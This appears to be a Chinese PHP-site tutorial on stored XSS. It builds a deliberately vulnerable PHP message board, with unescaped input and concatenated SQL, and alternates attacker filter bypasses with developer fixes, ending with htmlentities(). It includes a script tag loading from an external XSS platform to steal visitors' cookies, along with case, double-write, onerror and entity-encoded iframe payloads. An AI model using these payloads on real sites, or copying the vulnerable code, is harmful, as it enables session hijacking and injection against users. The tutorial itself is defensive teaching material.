首頁 運維 安全 一次儲存型XSS的攻防實戰

一次儲存型XSS的攻防實戰

Dec 03, 2019 pm 05:42 PM
xss 實戰 攻防

一次儲存型XSS的攻防實戰

什麼是儲存型XSS

#它是透過對網頁注入可執行程式碼且成功地被瀏覽器執行,達到攻擊的目的,一般是注入一段javascript腳本。在測試過程中,我們一般是使用:

<script>alert(1)</script>
登入後複製
登入後複製

透過這段js程式碼,彈個框來證明有xss漏洞。那麼,可能新手就會問了,彈個框有什麼用呢?

其實,彈框只是為了證明有這個漏洞。而此漏洞的利用方式由很多種。

例如,你可以使用xss平台:

一次儲存型XSS的攻防實戰

寫入一段平台產生的xss腳本:

<script src=//xsspt.com/ZsgUBf></script>
登入後複製

當某人進入帶有這個腳本的頁面時,js腳本會取得他的cookie並發送到xss平台。

你只需要登入xss平台等待即可,拿到cookie後,可以不需要密碼登入他的帳號。

注意:本文的重點是一步一步以駭客的角度進行xss攻擊,再討論如何站在開發者的角度去一步一步防禦xss攻擊。所以我會在本文中以開發的身份修正後端程式碼,再以駭客的身份進行前端頁面的xss攻擊,這一點需要注意哦。

對於儲存型xss漏洞的表現形式,比較經典的是留言板。但是我們都是遵紀守法的好同學,不能對外面的網站進行測試,所以就花半個小時自己手擼一個留言板咯。

首先,應該有前端展示的頁面Message_Board.php和後端儲存資料的頁面addMessage.php

一次儲存型XSS的攻防實戰

前端程式碼不是本文重點(感興趣的可以自行查看前端程式碼),我們將重點放在後端程式碼addMessage.php:

<?php
	$nickname = @$_POST[&#39;nickname&#39;];//昵称
	$email = @$_POST[&#39;email&#39;];//邮箱
	$content = @$_POST[&#39;content&#39;];//留言内容
	$now_time = @$_POST[&#39;now_time&#39;];//留言时间
	$ini= @parse_ini_file("config.ini");
    $con = @mysql_connect($ini["servername"],$ini["username"],$ini["password"]);	if($con){
		mysql_query("set names &#39;utf8&#39;");//解决中文乱码问题
		mysql_select_db($ini["dbname"]);
		$sql1 = "select count(*) from message_board";
		$result = mysql_query($sql1);
		$floor = mysql_fetch_row($result)[0] + 1;
		$sql = "insert into message_board values
($floor,\"$nickname\",\"$email\",\"$content\",\"$now_time\")";
		mysql_query($sql);
	}?>
登入後複製

可以看到,我們對傳入的四個參數完全沒有處理,而是直接存入資料庫中。

所以,只要我們這樣輸入:

一次儲存型XSS的攻防實戰

提交之後,系統會自動刷新頁面出現彈框:

一次儲存型XSS的攻防實戰

點擊確定後,你會發現留言內容和留言者的部分都是空。

一次儲存型XSS的攻防實戰

這是因為js腳本已經被解析了,這時我們按下F12,開啟瀏覽器的開發者工具,發現了js腳本。

一次儲存型XSS的攻防實戰

那麼,問題來了。

畢竟我們還有另一個身份,開發者該如何防禦呢?

0×00、來個最簡單的,只修改前端程式碼

在input標籤裡面加上maxlength屬性

<input type="text" name="nickname" placeholder="留言者昵称" maxlength="10">
登入後複製

至於原理嘛,就是因為js腳本的形式為<script></script>長度為17,所以只要我們在前端對長度進行限制,就可以阻止駭客進行xss攻擊了。

可是!開發可沒這麼好做!

我們是想做開發的駭客,所以還要自己搞自己。

身為攻擊者,我們同樣可以修改前端程式碼,具體的操作是使用瀏覽器的F12(開發者工具)

一次儲存型XSS的攻防實戰

可以看到,我們可以直接進行長度的修改。

另外,還可以用抓包的方法,在包包裡面直接寫,也是不受長度限制的。

0×01、對關鍵字script進行過濾

作為開發者,你很容易發現,要想進行xss攻擊,必須插入一段js腳本,而js腳本的特徵是很明顯的,腳本中包含script關鍵字,那麼我們只需要進行script過濾。

回到之前的程式碼。

為方便說明,我只取nickname參數,其實傳入的四個參數需要做同樣的處理。

$nickname = str_replace("script", "", @$_POST[&#39;nickname&#39;]);//昵称
登入後複製

上面这个str_replace()函数的意思是把script替换为空。

可以看到,script被替换为空,弹框失败。

一次儲存型XSS的攻防實戰

那么黑客该如何继续进行攻击呢?

答案是:大小写绕过

<script>alert(1)</script>
登入後複製
登入後複製

一次儲存型XSS的攻防實戰

因为js是不区分大小写的,所以我们的大小写不影响脚本的执行。

成功弹框!

一次儲存型XSS的攻防實戰

0×02、使用str_ireplace()函数进行不区分大小写地过滤script关键字

作为一名优秀的开发,发现了问题当然要及时改正,不区分大小写不就行了嘛。

后端代码修正如下:

$nickname = str_ireplace("script", "", @$_POST[&#39;nickname&#39;]);//昵称
登入後複製

str_ireplace()函数类似于上面的str_replace(),但是它不区分大小写。

那么,黑客该如何绕过?

答案是:双写script

<Sscriptcript>alert(1)</Sscriptcript>
登入後複製

一次儲存型XSS的攻防實戰

原理就是str_ireplace()函数只找出了中间的script关键字,前面的S和后面的cript组合在一起,构成了新的Script关键字。

弹框成功!

一次儲存型XSS的攻防實戰

0×03、使用preg_replace()函数进行正则表达式过滤script关键字

$nickname = preg_replace( "/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i", "", @$_POST[&#39;nickname&#39;]);//昵称
登入後複製

显然,弹框失败。

一次儲存型XSS的攻防實戰

攻击者如何再一次绕过?

答案是:用img标签的oneerror属性

<img  src="/static/imghw/default1.png"  data-src="https://img.php.cn/upload/image/699/197/806/1575365321709550.jpg"  class="lazy"  src=x onerror=alert(1) alt="一次儲存型XSS的攻防實戰" >
登入後複製

0×04、过滤alert关键字

看到这里,不知道你烦了没有,以开发的角度来讲,我都有点烦。大黑阔你不是喜欢弹窗么?我过滤alert关键字看你怎么弹!

$nickname = preg_replace( "/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i", "", @$_POST[&#39;nickname&#39;]);//昵称
$nickname = preg_replace( "(.*)a(.*)l(.*)e(.*)r(.*)t/i", "", $nickname);//昵称
登入後複製

那么,攻击者该怎么办呢?

答案是:编码绕过

<a href=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;
&#49;&#41;>a</a>
登入後複製

当点击页面上的超链接时,会弹框。

一次儲存型XSS的攻防實戰

但是为什么呢?

这种编码方式为字符编码

字符编码:十进制、十六进制ASCII码或unicode 字符编码,样式为“&#数值;”, 例如“j”可以编码为“j”或“j ”

上述代码解码之后如下:

<a href=javascript:alert(1)>a</a>
登入後複製

你能明显感觉到限制:由于使用到了a标签,所以只有点击时,才会弹框。

作为一个大黑阔,我们当然是不满意的,能不能让所有进入这个页面的人都弹框?

当然可以了:用iframe标签编码

<iframe src=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;
&#41;>
登入後複製

这种写法,同样既没有script关键字,又没有alert关键字。

一次儲存型XSS的攻防實戰

可以看到弹框成功!

一次儲存型XSS的攻防實戰

可是你也能看到,由于使用了iframe标签,留言板的样式已经变形了。实战中尽量不要用。

0×05、过滤特殊字符

优秀的开发,永不认输!你个小小的黑阔,不就是会插入js代码么?我过滤特殊字符,看你代码咋被解析?

可是我不想手撸代码来列举那么多特殊字符怎么办?

php给我们提供了htmlentities()函数:

$nickname = htmlentities(@$_POST[&#39;nickname&#39;]);//昵称
登入後複製

htmlentities()函数的作用是把字符转换为 HTML 实体。

一次儲存型XSS的攻防實戰

看到这里,你可能还是不明白HTML字符实体是什么。我举个例子吧,当你想在HTML页面上显示一个小于号(<)时,浏览器会认为这是标签的一部分(因为所有标签都由大于号,标签名和小于号构成),因此,为了能在页面上显示这个小于号(<),我们引入了HTML字符实体的概念,能够在页面上显示类似于小于号(<)这样的特殊符号,而不会影响到页面标签的解析。

可以看到,我们输入的内容全部显示在页面上了。

一次儲存型XSS的攻防實戰

可是却没有弹框。

我们鼠标右键,查看网页源代码

一次儲存型XSS的攻防實戰

际上,我们输入的内容已经变成了HTML实体:

<iframe src=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;
&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;>
登入後複製

无法被解析为js脚本。

黑客在当前场景下已经无法攻击了(在某些其他场景,即使使用了htmlentities()函数,仍然是可以攻击的,这就不在本文讨论范围之内了)

0×06、总结

开发者不应该只考虑关键字的过滤,还应该考虑特殊符号的过滤 。

黑客在面对未知的情况时,要不断尝试,这对于知识的储备量有较高的要求。

对于xss攻击,站在开发者角度来讲,仅仅用一个htmlentities()函数基本可以做到防御,可是一个优秀的开发者应该明白它的原理。站在黑客的角度来讲,面对环境的逐步变化,条件的逐步限制,攻击思路灵活变化是对整个职业生涯有益的。

相关文章教程推荐:web服务器安全

以上是一次儲存型XSS的攻防實戰的詳細內容。更多資訊請關注PHP中文網其他相關文章!

本網站聲明
本文內容由網友自願投稿,版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容,請聯絡admin@php.cn

熱AI工具

Undresser.AI Undress

Undresser.AI Undress

人工智慧驅動的應用程序,用於創建逼真的裸體照片

AI Clothes Remover

AI Clothes Remover

用於從照片中去除衣服的線上人工智慧工具。

Undress AI Tool

Undress AI Tool

免費脫衣圖片

Clothoff.io

Clothoff.io

AI脫衣器

Video Face Swap

Video Face Swap

使用我們完全免費的人工智慧換臉工具,輕鬆在任何影片中換臉!

熱工具

記事本++7.3.1

記事本++7.3.1

好用且免費的程式碼編輯器

SublimeText3漢化版

SublimeText3漢化版

中文版,非常好用

禪工作室 13.0.1

禪工作室 13.0.1

強大的PHP整合開發環境

Dreamweaver CS6

Dreamweaver CS6

視覺化網頁開發工具

SublimeText3 Mac版

SublimeText3 Mac版

神級程式碼編輯軟體(SublimeText3)

Laravel中的跨站腳本攻擊(XSS)和跨站請求偽造(CSRF)防護 Laravel中的跨站腳本攻擊(XSS)和跨站請求偽造(CSRF)防護 Aug 13, 2023 pm 04:43 PM

Laravel中的跨站腳本攻擊(XSS)和跨站請求偽造(CSRF)防護隨著互聯網的發展,網路安全問題也變得越來越嚴峻。其中,跨站腳本攻擊(Cross-SiteScripting,XSS)和跨站請求偽造(Cross-SiteRequestForgery,CSRF)是最常見的攻擊手段之一。 Laravel作為一款受歡迎的PHP開發框架,為使用者提供了多種安全機

PHP實戰:快速實作斐波那契數列的程式碼範例 PHP實戰:快速實作斐波那契數列的程式碼範例 Mar 20, 2024 pm 02:24 PM

PHP實戰:快速實現斐波那契數列的程式碼範例斐波那契數列是數學中一個非常有趣且常見的數列,其定義如下:第一個和第二個數為0和1,從第三個數開始,每個數都是前兩個數的和。斐波那契數列的前幾個數字依序為0,1,1.2,3,5,8,13,21,...依此類推。在PHP中,我們可以透過遞歸和迭代兩種方式來實現斐波那契數列的生成。下面我們分別來展示這兩

Java開發實戰:整合七牛雲雲端儲存服務實作文件上傳 Java開發實戰:整合七牛雲雲端儲存服務實作文件上傳 Jul 06, 2023 pm 06:22 PM

Java開發實戰:整合七牛雲端儲存服務實作檔案上傳引言隨著雲端運算和雲端儲存的發展,越來越多的應用程式需要將檔案上傳至雲端進行儲存和管理。雲端儲存服務的優勢在於高可靠性、可擴充性和靈活性。本文將介紹如何使用Java語言開發,整合七牛雲端儲存服務,實現文件上傳功能。七牛雲簡介七牛雲是國內領先的雲端儲存服務供應商,提供了全面的雲端儲存和內容分發服務。使用者可以透過七牛雲提

深入學習 Elasticsearch 查詢文法與實戰 深入學習 Elasticsearch 查詢文法與實戰 Oct 03, 2023 am 08:42 AM

深入學習Elasticsearch查詢語法與實戰引言:Elasticsearch是一款基於Lucene的開源搜尋引擎,主要用於分散式搜尋與分析,廣泛應用於大規模資料的全文搜尋、日誌分析、推薦系統等場景。在使用Elasticsearch進行資料查詢時,靈活運用查詢語法是提高查詢效率的關鍵。本文將深入探討Elasticsearch查詢語法,並結合實際案例給出

MySQL表設計實戰:建立一個電商訂單表和商品評論表 MySQL表設計實戰:建立一個電商訂單表和商品評論表 Jul 03, 2023 am 08:07 AM

MySQL表設計實戰:建立一個電商訂單表和商品評論表在電商平台的資料庫中,訂單表和商品評論表是兩個非常重要的表格。本文將介紹如何使用MySQL來設計和建立這兩個表格,並給出程式碼範例。一、訂單表的設計與建立訂單表用於儲存使用者的購買訊息,包括訂單編號、使用者ID、商品ID、購買數量、訂單狀態等欄位。首先,我們需要建立一個名為"order"的表格,使用CREATET

Golang實戰:資料匯出功能的實作技巧分享 Golang實戰:資料匯出功能的實作技巧分享 Feb 29, 2024 am 09:00 AM

資料匯出功能在實際開發中是非常常見的需求,特別是在後台管理系統或資料報表匯出等場景。本文將以Golang語言為例,分享資料導出功能的實作技巧,並給出具體的程式碼範例。 1.環境準備在開始之前,確保已經安裝好Golang環境,並且熟悉Golang的基本語法和操作。另外,為了實現資料匯出功能,可能還需要使用第三方函式庫,例如github.com/360EntSec

手把手教你uniapp和小程式分包(圖文) 手把手教你uniapp和小程式分包(圖文) Jul 22, 2022 pm 04:55 PM

本篇文章為大家帶來了關於uniapp跨域的相關知識,其中介紹了uniapp和小程式分包的相關問題,每個使用分包小程式必定含有一個主包。所謂的主包,即放置預設啟動頁面/TabBar 頁面,以及一些所有分包都需用到公共資源/JS 腳本;而分包則是根據開發者的配置進行劃分,希望對大家有幫助。

Vue實戰:日期選擇器組件開發 Vue實戰:日期選擇器組件開發 Nov 24, 2023 am 09:03 AM

Vue實戰:日期選擇器元件開發引言:日期選擇器是在日常開發中常用到的一個元件,它可以方便地選擇日期,並提供各種設定選項。本文將介紹如何使用Vue框架來開發一個簡單的日期選擇器元件,並提供具體的程式碼範例。一、需求分析在開始開發前,我們需要進行需求分析,明確組件的功能與特性。根據常見的日期選擇器元件功能,我們需要實作以下幾個功能點:基礎功能:能夠選擇日期,並

See all articles